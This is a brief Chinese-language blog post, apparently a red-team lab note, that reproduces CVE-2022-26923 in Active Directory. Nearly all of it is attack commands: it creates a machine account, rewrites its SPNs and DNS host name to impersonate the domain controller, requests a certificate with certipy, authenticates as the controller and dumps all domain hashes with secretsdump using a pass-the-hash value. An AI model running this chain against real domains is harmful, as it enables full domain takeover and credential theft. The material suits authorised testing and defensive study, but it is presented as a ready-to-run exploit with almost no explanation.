【域滲透】CVE-2022–26923
阿新 • • 發佈:2022-05-12
一、漏洞復現
新建機器賬號:
python3 addcomputer.py 'redteam.com/tony:PassWord@123' -method SAMR -computer-name 'TonyPC' -computer-pass 'pass.123' -dc-ip 192.168.172.201
設定相關屬性:
https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
PS C:\Users\tony\Desktop> Import-Module .\Import-ActiveDirectory.ps1 PS C:\Users\tony\Desktop> Import-ActiveDirectory PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -ServicePrincipalNames @{REPLACE="HOST/TonyPC","RestrictedKrbHost/TonyPC"} -Verbose PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName $null PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName dc.redteam.com
使用certipy請求證書:
─# certipy req 'redteam.com/TonyPC$:PassWord@[email protected]' -ca REDTEAM-DC-CA -template Machine -debug
使用證書認證獲取DC hash:
certipy auth -pfx dc.pfx -dc-ip 192.168.172.201
dump hash
python3 secretsdump.py 'redteam.com/[email protected]' -hashes :dd4390e7e449062d421301fef2c9ec7e